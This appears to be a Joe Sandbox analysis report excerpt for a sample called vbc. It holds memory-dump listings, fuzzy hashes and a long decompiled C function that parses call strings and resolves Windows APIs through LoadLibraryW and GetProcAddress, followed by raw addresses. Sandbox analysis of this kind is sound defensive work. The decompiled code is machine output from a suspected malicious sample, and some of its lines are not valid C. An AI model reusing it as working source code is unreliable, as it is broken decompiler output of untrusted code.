                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E73281BFF() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				WCHAR* _v24;
                                                				WCHAR* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				WCHAR* _v48;
                                                				signed int _v52;
                                                				void* _v56;
                                                				intOrPtr _v60;
                                                				WCHAR* _t208;
                                                				signed int _t211;
                                                				void* _t213;
                                                				void* _t215;
                                                				WCHAR* _t217;
                                                				void* _t225;
                                                				struct HINSTANCE__* _t226;
                                                				struct HINSTANCE__* _t227;
                                                				struct HINSTANCE__* _t229;
                                                				signed short _t231;
                                                				struct HINSTANCE__* _t234;
                                                				struct HINSTANCE__* _t236;
                                                				void* _t237;
                                                				intOrPtr* _t238;
                                                				void* _t249;
                                                				signed char _t250;
                                                				signed int _t251;
                                                				void* _t255;
                                                				struct HINSTANCE__* _t257;
                                                				void* _t258;
                                                				signed int _t260;
                                                				signed int _t261;
                                                				signed short* _t264;
                                                				signed int _t269;
                                                				signed int _t272;
                                                				signed int _t274;
                                                				void* _t277;
                                                				void* _t281;
                                                				struct HINSTANCE__* _t283;
                                                				signed int _t286;
                                                				void _t287;
                                                				signed int _t288;
                                                				signed int _t300;
                                                				signed int _t301;
                                                				signed short _t304;
                                                				void* _t305;
                                                				signed int _t309;
                                                				signed int _t312;
                                                				signed int _t315;
                                                				signed int _t316;
                                                				signed int _t317;
                                                				signed short* _t321;
                                                				WCHAR* _t322;
                                                				WCHAR* _t324;
                                                				WCHAR* _t325;
                                                				struct HINSTANCE__* _t326;
                                                				void* _t328;
                                                				signed int _t331;
                                                				void* _t332;
                                                
                                                				_t283 = 0;
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				_v16 = 0;
                                                				_v8 = 0;
                                                				_v40 = 0;
                                                				_t332 = 0;
                                                				_v52 = 0;
                                                				_v44 = 0;
                                                				_t208 = E732812BB();
                                                				_v24 = _t208;
                                                				_v28 = _t208;
                                                				_v48 = E732812BB();
                                                				_t321 = E732812E3();
                                                				_v56 = _t321;
                                                				_v12 = _t321;
                                                				while(1) {
                                                					_t211 = _v32;
                                                					_v60 = _t211;
                                                					if(_t211 != _t283 && _t332 == _t283) {
                                                						break;
                                                					}
                                                					_t286 =  *_t321 & 0x0000ffff;
                                                					_t213 = _t286 - _t283;
                                                					if(_t213 == 0) {
                                                						_t37 =  &_v32;
                                                						 *_t37 = _v32 | 0xffffffff;
                                                						__eflags =  *_t37;
                                                						L20:
                                                						_t215 = _v60 - _t283;
                                                						if(_t215 == 0) {
                                                							__eflags = _t332 - _t283;
                                                							 *_v28 = _t283;
                                                							if(_t332 == _t283) {
                                                								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                								_t332 = _t255;
                                                								 *(_t332 + 0x1010) = _t283;
                                                								 *(_t332 + 0x1014) = _t283;
                                                							}
                                                							_t287 = _v36;
                                                							_t47 = _t332 + 8; // 0x8
                                                							_t217 = _t47;
                                                							_t48 = _t332 + 0x808; // 0x808
                                                							_t322 = _t48;
                                                							 *_t332 = _t287;
                                                							_t288 = _t287 - _t283;
                                                							__eflags = _t288;
                                                							 *_t217 = _t283;
                                                							 *_t322 = _t283;
                                                							 *(_t332 + 0x1008) = _t283;
                                                							 *(_t332 + 0x100c) = _t283;
                                                							 *(_t332 + 4) = _t283;
                                                							if(_t288 == 0) {
                                                								__eflags = _v28 - _v24;
                                                								if(_v28 == _v24) {
                                                									goto L42;
                                                								}
                                                								_t328 = 0;
                                                								GlobalFree(_t332);
                                                								_t332 = E732813B1(_v24);
                                                								__eflags = _t332 - _t283;
                                                								if(_t332 == _t283) {
                                                									goto L42;
                                                								} else {
                                                									goto L35;
                                                								}
                                                								while(1) {
                                                									L35:
                                                									_t249 =  *(_t332 + 0x1ca0);
                                                									__eflags = _t249 - _t283;
                                                									if(_t249 == _t283) {
                                                										break;
                                                									}
                                                									_t328 = _t332;
                                                									_t332 = _t249;
                                                									__eflags = _t332 - _t283;
                                                									if(_t332 != _t283) {
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								__eflags = _t328 - _t283;
                                                								if(_t328 != _t283) {
                                                									 *(_t328 + 0x1ca0) = _t283;
                                                								}
                                                								_t250 =  *(_t332 + 0x1010);
                                                								__eflags = _t250 & 0x00000008;
                                                								if((_t250 & 0x00000008) == 0) {
                                                									_t251 = _t250 | 0x00000002;
                                                									__eflags = _t251;
                                                									 *(_t332 + 0x1010) = _t251;
                                                								} else {
                                                									_t332 = E7328162F(_t332);
                                                									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                								}
                                                								goto L42;
                                                							} else {
                                                								_t300 = _t288 - 1;
                                                								__eflags = _t300;
                                                								if(_t300 == 0) {
                                                									L31:
                                                									lstrcpyW(_t217, _v48);
                                                									L32:
                                                									lstrcpyW(_t322, _v24);
                                                									goto L42;
                                                								}
                                                								_t301 = _t300 - 1;
                                                								__eflags = _t301;
                                                								if(_t301 == 0) {
                                                									goto L32;
                                                								}
                                                								__eflags = _t301 != 1;
                                                								if(_t301 != 1) {
                                                									goto L42;
                                                								}
                                                								goto L31;
                                                							}
                                                						} else {
                                                							if(_t215 == 1) {
                                                								_t257 = _v16;
                                                								if(_v40 == _t283) {
                                                									_t257 = _t257 - 1;
                                                								}
                                                								 *(_t332 + 0x1014) = _t257;
                                                							}
                                                							L42:
                                                							_v12 = _v12 + 2;
                                                							_v28 = _v24;
                                                							L59:
                                                							if(_v32 != 0xffffffff) {
                                                								_t321 = _v12;
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                					}
                                                					_t258 = _t213 - 0x23;
                                                					if(_t258 == 0) {
                                                						__eflags = _t321 - _v56;
                                                						if(_t321 <= _v56) {
                                                							L17:
                                                							__eflags = _v44 - _t283;
                                                							if(_v44 != _t283) {
                                                								L43:
                                                								_t260 = _v32 - _t283;
                                                								__eflags = _t260;
                                                								if(_t260 == 0) {
                                                									_t261 = _t286;
                                                									while(1) {
                                                										__eflags = _t261 - 0x22;
                                                										if(_t261 != 0x22) {
                                                											break;
                                                										}
                                                										_t321 =  &(_t321[1]);
                                                										__eflags = _v44 - _t283;
                                                										_v12 = _t321;
                                                										if(_v44 == _t283) {
                                                											_v44 = 1;
                                                											L162:
                                                											_v28 =  &(_v28[0]);
                                                											 *_v28 =  *_t321;
                                                											L58:
                                                											_t331 =  &(_t321[1]);
                                                											__eflags = _t331;
                                                											_v12 = _t331;
                                                											goto L59;
                                                										}
                                                										_t261 =  *_t321 & 0x0000ffff;
                                                										_v44 = _t283;
                                                									}
                                                									__eflags = _t261 - 0x2a;
                                                									if(_t261 == 0x2a) {
                                                										_v36 = 2;
                                                										L57:
                                                										_t321 = _v12;
                                                										_v28 = _v24;
                                                										_t283 = 0;
                                                										__eflags = 0;
                                                										goto L58;
                                                									}
                                                									__eflags = _t261 - 0x2d;
                                                									if(_t261 == 0x2d) {
                                                										L151:
                                                										_t304 =  *_t321;
                                                										__eflags = _t304 - 0x2d;
                                                										if(_t304 != 0x2d) {
                                                											L154:
                                                											_t264 =  &(_t321[1]);
                                                											__eflags =  *_t264 - 0x3a;
                                                											if( *_t264 != 0x3a) {
                                                												goto L162;
                                                											}
                                                											__eflags = _t304 - 0x2d;
                                                											if(_t304 == 0x2d) {
                                                												goto L162;
                                                											}
                                                											_v36 = 1;
                                                											L157:
                                                											_v12 = _t264;
                                                											__eflags = _v28 - _v24;
                                                											if(_v28 <= _v24) {
                                                												 *_v48 = _t283;
                                                											} else {
                                                												 *_v28 = _t283;
                                                												lstrcpyW(_v48, _v24);
                                                											}
                                                											goto L57;
                                                										}
                                                										_t264 =  &(_t321[1]);
                                                										__eflags =  *_t264 - 0x3e;
                                                										if( *_t264 != 0x3e) {
                                                											goto L154;
                                                										}
                                                										_v36 = 3;
                                                										goto L157;
                                                									}
                                                									__eflags = _t261 - 0x3a;
                                                									if(_t261 != 0x3a) {
                                                										goto L162;
                                                									}
                                                									goto L151;
                                                								}
                                                								_t269 = _t260 - 1;
                                                								__eflags = _t269;
                                                								if(_t269 == 0) {
                                                									L80:
                                                									_t305 = _t286 + 0xffffffde;
                                                									__eflags = _t305 - 0x55;
                                                									if(_t305 > 0x55) {
                                                										goto L57;
                                                									}
                                                									switch( *((intOrPtr*)(( *(_t305 + 0x732823e8) & 0x000000ff) * 4 +  &M7328235C))) {
                                                										case 0:
                                                											__ecx = _v24;
                                                											__edi = _v12;
                                                											while(1) {
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__ax =  *__edi;
                                                												__eflags = __ax - __dx;
                                                												if(__ax != __dx) {
                                                													goto L132;
                                                												}
                                                												L131:
                                                												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                													L136:
                                                													 *__ecx =  *__ecx & 0x00000000;
                                                													__eax = E732812CC(_v24);
                                                													__ebx = __eax;
                                                													goto L97;
                                                												}
                                                												L132:
                                                												__eflags = __ax;
                                                												if(__ax == 0) {
                                                													goto L136;
                                                												}
                                                												__eflags = __ax - __dx;
                                                												if(__ax == __dx) {
                                                													__edi = __edi + 1;
                                                													__edi = __edi + 1;
                                                													__eflags = __edi;
                                                												}
                                                												__ax =  *__edi;
                                                												 *__ecx =  *__edi;
                                                												__ecx = __ecx + 1;
                                                												__ecx = __ecx + 1;
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__ax =  *__edi;
                                                												__eflags = __ax - __dx;
                                                												if(__ax != __dx) {
                                                													goto L132;
                                                												}
                                                												goto L131;
                                                											}
                                                										case 1:
                                                											_v8 = 1;
                                                											goto L57;
                                                										case 2:
                                                											_v8 = _v8 | 0xffffffff;
                                                											goto L57;
                                                										case 3:
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v16 = _v16 + 1;
                                                											goto L85;
                                                										case 4:
                                                											__eflags = _v20;
                                                											if(_v20 != 0) {
                                                												goto L57;
                                                											}
                                                											_v12 = _v12 - 2;
                                                											__ebx = E732812BB();
                                                											 &_v12 = E73281B86( &_v12);
                                                											__eax = E73281510(__edx, __eax, __edx, __ebx);
                                                											goto L97;
                                                										case 5:
                                                											L105:
                                                											_v20 = _v20 + 1;
                                                											goto L57;
                                                										case 6:
                                                											_push(7);
                                                											goto L123;
                                                										case 7:
                                                											_push(0x19);
                                                											goto L143;
                                                										case 8:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L107;
                                                										case 9:
                                                											_push(0x15);
                                                											goto L143;
                                                										case 0xa:
                                                											_push(0x16);
                                                											goto L143;
                                                										case 0xb:
                                                											_push(0x18);
                                                											goto L143;
                                                										case 0xc:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L118;
                                                										case 0xd:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L109;
                                                										case 0xe:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L111;
                                                										case 0xf:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L122;
                                                										case 0x10:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L113;
                                                										case 0x11:
                                                											_push(3);
                                                											goto L123;
                                                										case 0x12:
                                                											_push(0x17);
                                                											L143:
                                                											_pop(__ebx);
                                                											goto L98;
                                                										case 0x13:
                                                											__eax =  &_v12;
                                                											__eax = E73281B86( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											__eflags = __ebx - 0xb;
                                                											if(__ebx < 0xb) {
                                                												__ebx = __ebx + 0xa;
                                                											}
                                                											goto L97;
                                                										case 0x14:
                                                											__ebx = 0xffffffff;
                                                											goto L98;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L116;
                                                										case 0x16:
                                                											__ecx = 0;
                                                											__eflags = 0;
                                                											goto L91;
                                                										case 0x17:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L120;
                                                										case 0x18:
                                                											_t271 =  *(_t332 + 0x1014);
                                                											__eflags = _t271 - _v16;
                                                											if(_t271 > _v16) {
                                                												_v16 = _t271;
                                                											}
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v36 - 3 = _t271 - (_v36 == 3);
                                                											if(_t271 != _v36 == 3) {
                                                												L85:
                                                												_v40 = 1;
                                                											}
                                                											goto L57;
                                                										case 0x19:
                                                											L107:
                                                											__ecx = 0;
                                                											_v8 = 2;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1a:
                                                											L118:
                                                											_push(5);
                                                											goto L123;
                                                										case 0x1b:
                                                											L109:
                                                											__ecx = 0;
                                                											_v8 = 3;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1c:
                                                											L111:
                                                											__ecx = 0;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1d:
                                                											L122:
                                                											_push(6);
                                                											goto L123;
                                                										case 0x1e:
                                                											L113:
                                                											_push(2);
                                                											goto L123;
                                                										case 0x1f:
                                                											__eax =  &_v12;
                                                											__eax = E73281B86( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											goto L97;
                                                										case 0x20:
                                                											L116:
                                                											_v52 = _v52 + 1;
                                                											_push(4);
                                                											_pop(__ecx);
                                                											goto L91;
                                                										case 0x21:
                                                											L120:
                                                											_push(4);
                                                											L123:
                                                											_pop(__ecx);
                                                											L91:
                                                											__edi = _v16;
                                                											__edx =  *(0x7328405c + __ecx * 4);
                                                											__eax =  ~__eax;
                                                											asm("sbb eax, eax");
                                                											_v40 = 1;
                                                											__edi = _v16 << 5;
                                                											__eax = __eax & 0x00008000;
                                                											__edi = (_v16 << 5) + __esi;
                                                											__eax = __eax | __ecx;
                                                											__eflags = _v8;
                                                											 *(__edi + 0x1018) = __eax;
                                                											if(_v8 < 0) {
                                                												L93:
                                                												__edx = 0;
                                                												__edx = 1;
                                                												__eflags = 1;
                                                												L94:
                                                												__eflags = _v8 - 1;
                                                												 *(__edi + 0x1028) = __edx;
                                                												if(_v8 == 1) {
                                                													__eax =  &_v12;
                                                													__eax = E73281B86( &_v12);
                                                													__eax = __eax + 1;
                                                													__eflags = __eax;
                                                													_v8 = __eax;
                                                												}
                                                												__eax = _v8;
                                                												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                												_t136 = _v16 + 0x81; // 0x81
                                                												_t136 = _t136 << 5;
                                                												__eax = 0;
                                                												__eflags = 0;
                                                												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                												L97:
                                                												__eflags = __ebx;
                                                												if(__ebx == 0) {
                                                													goto L57;
                                                												}
                                                												L98:
                                                												__eflags = _v20;
                                                												_v40 = 1;
                                                												if(_v20 != 0) {
                                                													L103:
                                                													__eflags = _v20 - 1;
                                                													if(_v20 == 1) {
                                                														__eax = _v16;
                                                														__eax = _v16 << 5;
                                                														__eflags = __eax;
                                                														 *(__eax + __esi + 0x102c) = __ebx;
                                                													}
                                                													goto L105;
                                                												}
                                                												_v16 = _v16 << 5;
                                                												_t144 = __esi + 0x1030; // 0x1030
                                                												__edi = (_v16 << 5) + _t144;
                                                												__eax =  *__edi;
                                                												__eflags = __eax - 0xffffffff;
                                                												if(__eax <= 0xffffffff) {
                                                													L101:
                                                													__eax = GlobalFree(__eax);
                                                													L102:
                                                													 *__edi = __ebx;
                                                													goto L103;
                                                												}
                                                												__eflags = __eax - 0x19;
                                                												if(__eax <= 0x19) {
                                                													goto L102;
                                                												}
                                                												goto L101;
                                                											}
                                                											__eflags = __edx;
                                                											if(__edx > 0) {
                                                												goto L94;
                                                											}
                                                											goto L93;
                                                										case 0x22:
                                                											goto L57;
                                                									}
                                                								}
                                                								_t272 = _t269 - 1;
                                                								__eflags = _t272;
                                                								if(_t272 == 0) {
                                                									_v16 = _t283;
                                                									goto L80;
                                                								}
                                                								__eflags = _t272 != 1;
                                                								if(_t272 != 1) {
                                                									goto L162;
                                                								}
                                                								__eflags = _t286 - 0x6e;
                                                								if(__eflags > 0) {
                                                									_t309 = _t286 - 0x72;
                                                									__eflags = _t309;
                                                									if(_t309 == 0) {
                                                										_push(4);
                                                										L74:
                                                										_pop(_t274);
                                                										L75:
                                                										__eflags = _v8 - 1;
                                                										if(_v8 != 1) {
                                                											_t96 = _t332 + 0x1010;
                                                											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                											__eflags =  *_t96;
                                                										} else {
                                                											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                										}
                                                										_v8 = 1;
                                                										goto L57;
                                                									}
                                                									_t312 = _t309 - 1;
                                                									__eflags = _t312;
                                                									if(_t312 == 0) {
                                                										_push(0x10);
                                                										goto L74;
                                                									}
                                                									__eflags = _t312 != 0;
                                                									if(_t312 != 0) {
                                                										goto L57;
                                                									}
                                                									_push(0x40);
                                                									goto L74;
                                                								}
                                                								if(__eflags == 0) {
                                                									_push(8);
                                                									goto L74;
                                                								}
                                                								_t315 = _t286 - 0x21;
                                                								__eflags = _t315;
                                                								if(_t315 == 0) {
                                                									_v8 =  ~_v8;
                                                									goto L57;
                                                								}
                                                								_t316 = _t315 - 0x11;
                                                								__eflags = _t316;
                                                								if(_t316 == 0) {
                                                									_t274 = 0x100;
                                                									goto L75;
                                                								}
                                                								_t317 = _t316 - 0x31;
                                                								__eflags = _t317;
                                                								if(_t317 == 0) {
                                                									_t274 = 1;
                                                									goto L75;
                                                								}
                                                								__eflags = _t317 != 0;
                                                								if(_t317 != 0) {
                                                									goto L57;
                                                								}
                                                								_push(0x20);
                                                								goto L74;
                                                							} else {
                                                								_v32 = _t283;
                                                								_v36 = _t283;
                                                								goto L20;
                                                							}
                                                						}
                                                						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                							goto L17;
                                                						}
                                                						__eflags = _v32 - _t283;
                                                						if(_v32 == _t283) {
                                                							goto L43;
                                                						}
                                                						goto L17;
                                                					}
                                                					_t277 = _t258 - 5;
                                                					if(_t277 == 0) {
                                                						__eflags = _v44 - _t283;
                                                						if(_v44 != _t283) {
                                                							goto L43;
                                                						} else {
                                                							__eflags = _v36 - 3;
                                                							_v32 = 1;
                                                							_v8 = _t283;
                                                							_v20 = _t283;
                                                							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                							_v40 = _t283;
                                                							goto L20;
                                                						}
                                                					}
                                                					_t281 = _t277 - 1;
                                                					if(_t281 == 0) {
                                                						__eflags = _v44 - _t283;
                                                						if(_v44 != _t283) {
                                                							goto L43;
                                                						} else {
                                                							_v32 = 2;
                                                							_v8 = _t283;
                                                							_v20 = _t283;
                                                							goto L20;
                                                						}
                                                					}
                                                					if(_t281 != 0x16) {
                                                						goto L43;
                                                					} else {
                                                						_v32 = 3;
                                                						_v8 = 1;
                                                						goto L20;
                                                					}
                                                				}
                                                				GlobalFree(_v56);
                                                				GlobalFree(_v24);
                                                				GlobalFree(_v48);
                                                				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                					L182:
                                                					return _t332;
                                                				} else {
                                                					_t225 =  *_t332 - 1;
                                                					if(_t225 == 0) {
                                                						_t187 = _t332 + 8; // 0x8
                                                						_t324 = _t187;
                                                						__eflags =  *_t324 - _t283;
                                                						if( *_t324 != _t283) {
                                                							_t226 = GetModuleHandleW(_t324);
                                                							__eflags = _t226 - _t283;
                                                							 *(_t332 + 0x1008) = _t226;
                                                							if(_t226 != _t283) {
                                                								L171:
                                                								_t192 = _t332 + 0x808; // 0x808
                                                								_t325 = _t192;
                                                								_t227 = E732816BD( *(_t332 + 0x1008), _t325);
                                                								__eflags = _t227 - _t283;
                                                								 *(_t332 + 0x100c) = _t227;
                                                								if(_t227 == _t283) {
                                                									__eflags =  *_t325 - 0x23;
                                                									if( *_t325 == 0x23) {
                                                										_t195 = _t332 + 0x80a; // 0x80a
                                                										_t231 = E732813B1(_t195);
                                                										__eflags = _t231 - _t283;
                                                										if(_t231 != _t283) {
                                                											__eflags = _t231 & 0xffff0000;
                                                											if((_t231 & 0xffff0000) == 0) {
                                                												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                											}
                                                										}
                                                									}
                                                								}
                                                								__eflags = _v52 - _t283;
                                                								if(_v52 != _t283) {
                                                									L178:
                                                									_t325[lstrlenW(_t325)] = 0x57;
                                                									_t229 = E732816BD( *(_t332 + 0x1008), _t325);
                                                									__eflags = _t229 - _t283;
                                                									if(_t229 != _t283) {
                                                										L166:
                                                										 *(_t332 + 0x100c) = _t229;
                                                										goto L182;
                                                									}
                                                									__eflags =  *(_t332 + 0x100c) - _t283;
                                                									L180:
                                                									if(__eflags != 0) {
                                                										goto L182;
                                                									}
                                                									L181:
                                                									_t206 = _t332 + 4;
                                                									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                									__eflags =  *_t206;
                                                									goto L182;
                                                								} else {
                                                									__eflags =  *(_t332 + 0x100c) - _t283;
                                                									if( *(_t332 + 0x100c) != _t283) {
                                                										goto L182;
                                                									}
                                                									goto L178;
                                                								}
                                                							}
                                                							_t234 = LoadLibraryW(_t324);
                                                							__eflags = _t234 - _t283;
                                                							 *(_t332 + 0x1008) = _t234;
                                                							if(_t234 == _t283) {
                                                								goto L181;
                                                							}
                                                							goto L171;
                                                						}
                                                						_t188 = _t332 + 0x808; // 0x808
                                                						_t236 = E732813B1(_t188);
                                                						 *(_t332 + 0x100c) = _t236;
                                                						__eflags = _t236 - _t283;
                                                						goto L180;
                                                					}
                                                					_t237 = _t225 - 1;
                                                					if(_t237 == 0) {
                                                						_t185 = _t332 + 0x808; // 0x808
                                                						_t238 = _t185;
                                                						__eflags =  *_t238 - _t283;
                                                						if( *_t238 == _t283) {
                                                							goto L182;
                                                						}
                                                						_t229 = E732813B1(_t238);
                                                						L165:
                                                						goto L166;
                                                					}
                                                					if(_t237 != 1) {
                                                						goto L182;
                                                					}
                                                					_t81 = _t332 + 8; // 0x8
                                                					_t284 = _t81;
                                                					_t326 = E732813B1(_t81);
                                                					 *(_t332 + 0x1008) = _t326;
                                                					if(_t326 == 0) {
                                                						goto L181;
                                                					}
                                                					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                					 *((intOrPtr*)(_t332 + 0x1050)) = E732812CC(_t284);
                                                					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                					_t90 = _t332 + 0x808; // 0x808
                                                					_t229 =  *(_t326->i + E732813B1(_t90) * 4);
                                                					goto L165;
                                                				}
                                                			}


































































                                                0x73281c07
                                                0x73281c0a
                                                0x73281c0d
                                                0x73281c10
                                                0x73281c13
                                                0x73281c16
                                                0x73281c19
                                                0x73281c1b
                                                0x73281c1e
                                                0x73281c21
                                                0x73281c26
                                                0x73281c29
                                                0x73281c31
                                                0x73281c39
                                                0x73281c3b
                                                0x73281c3e
                                                0x73281c46
                                                0x73281c46
                                                0x73281c4b
                                                0x73281c4e
                                                0x00000000
                                                0x00000000
                                                0x73281c5b
                                                0x73281c60
                                                0x73281c62
                                                0x73281cf4
                                                0x73281cf4
                                                0x73281cf4
                                                0x73281cf8
                                                0x73281cfb
                                                0x73281cfd
                                                0x73281d1f
                                                0x73281d21
                                                0x73281d24
                                                0x73281d2d
                                                0x73281d33
                                                0x73281d35
                                                0x73281d3b
                                                0x73281d3b
                                                0x73281d41
                                                0x73281d44
                                                0x73281d44
                                                0x73281d47
                                                0x73281d47
                                                0x73281d4d
                                                0x73281d4f
                                                0x73281d4f
                                                0x73281d51
                                                0x73281d54
                                                0x73281d57
                                                0x73281d5d
                                                0x73281d63
                                                0x73281d66
                                                0x73281d8a
                                                0x73281d8d
                                                0x00000000
                                                0x00000000
                                                0x73281d90
                                                0x73281d92
                                                0x73281da0
                                                0x73281da3
                                                0x73281da5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281da7
                                                0x73281da7
                                                0x73281da7
                                                0x73281dad
                                                0x73281daf
                                                0x00000000
                                                0x00000000
                                                0x73281db1
                                                0x73281db3
                                                0x73281db5
                                                0x73281db7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281db7
                                                0x73281db9
                                                0x73281dbb
                                                0x73281dbd
                                                0x73281dbd
                                                0x73281dc3
                                                0x73281dc9
                                                0x73281dcb
                                                0x73281ddf
                                                0x73281ddf
                                                0x73281de1
                                                0x73281dcd
                                                0x73281dd3
                                                0x73281dd6
                                                0x73281dd6
                                                0x00000000
                                                0x73281d68
                                                0x73281d68
                                                0x73281d68
                                                0x73281d69
                                                0x73281d71
                                                0x73281d75
                                                0x73281d7b
                                                0x73281d7f
                                                0x00000000
                                                0x73281d7f
                                                0x73281d6b
                                                0x73281d6b
                                                0x73281d6c
                                                0x00000000
                                                0x00000000
                                                0x73281d6e
                                                0x73281d6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281d6f
                                                0x73281cff
                                                0x73281d00
                                                0x73281d09
                                                0x73281d0c
                                                0x73281d19
                                                0x73281d19
                                                0x73281d0e
                                                0x73281d0e
                                                0x73281de7
                                                0x73281dea
                                                0x73281dee
                                                0x73281e61
                                                0x73281e65
                                                0x73281c43
                                                0x00000000
                                                0x73281c43
                                                0x00000000
                                                0x73281e65
                                                0x73281cfd
                                                0x73281c68
                                                0x73281c6b
                                                0x73281cce
                                                0x73281cd1
                                                0x73281ce3
                                                0x73281ce3
                                                0x73281ce6
                                                0x73281df3
                                                0x73281df6
                                                0x73281df6
                                                0x73281df8
                                                0x732821ae
                                                0x732821c6
                                                0x732821c6
                                                0x732821c9
                                                0x00000000
                                                0x00000000
                                                0x732821b3
                                                0x732821b4
                                                0x732821b7
                                                0x732821ba
                                                0x73282244
                                                0x7328224b
                                                0x73282251
                                                0x73282255
                                                0x73281e5c
                                                0x73281e5d
                                                0x73281e5d
                                                0x73281e5e
                                                0x00000000
                                                0x73281e5e
                                                0x732821c0
                                                0x732821c3
                                                0x732821c3
                                                0x732821cb
                                                0x732821ce
                                                0x73282238
                                                0x73281e51
                                                0x73281e54
                                                0x73281e57
                                                0x73281e5a
                                                0x73281e5a
                                                0x00000000
                                                0x73281e5a
                                                0x732821d0
                                                0x732821d3
                                                0x732821da
                                                0x732821da
                                                0x732821dd
                                                0x732821e1
                                                0x732821f5
                                                0x732821f5
                                                0x732821f8
                                                0x732821fc
                                                0x00000000
                                                0x00000000
                                                0x732821fe
                                                0x73282202
                                                0x00000000
                                                0x00000000
                                                0x73282204
                                                0x7328220b
                                                0x7328220b
                                                0x73282211
                                                0x73282214
                                                0x73282230
                                                0x73282216
                                                0x7328221f
                                                0x73282222
                                                0x73282222
                                                0x00000000
                                                0x73282214
                                                0x732821e3
                                                0x732821e6
                                                0x732821ea
                                                0x00000000
                                                0x00000000
                                                0x732821ec
                                                0x00000000
                                                0x732821ec
                                                0x732821d5
                                                0x732821d8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732821d8
                                                0x73281dfe
                                                0x73281dfe
                                                0x73281dff
                                                0x73281f49
                                                0x73281f49
                                                0x73281f50
                                                0x73281f53
                                                0x00000000
                                                0x00000000
                                                0x73281f60
                                                0x00000000
                                                0x7328214b
                                                0x7328214e
                                                0x73282151
                                                0x73282151
                                                0x73282152
                                                0x73282153
                                                0x73282156
                                                0x73282159
                                                0x7328215c
                                                0x00000000
                                                0x00000000
                                                0x7328215e
                                                0x7328215e
                                                0x73282162
                                                0x7328217a
                                                0x7328217d
                                                0x73282181
                                                0x73282187
                                                0x00000000
                                                0x73282187
                                                0x73282164
                                                0x73282164
                                                0x73282167
                                                0x00000000
                                                0x00000000
                                                0x73282169
                                                0x7328216c
                                                0x7328216e
                                                0x7328216f
                                                0x7328216f
                                                0x7328216f
                                                0x73282170
                                                0x73282173
                                                0x73282176
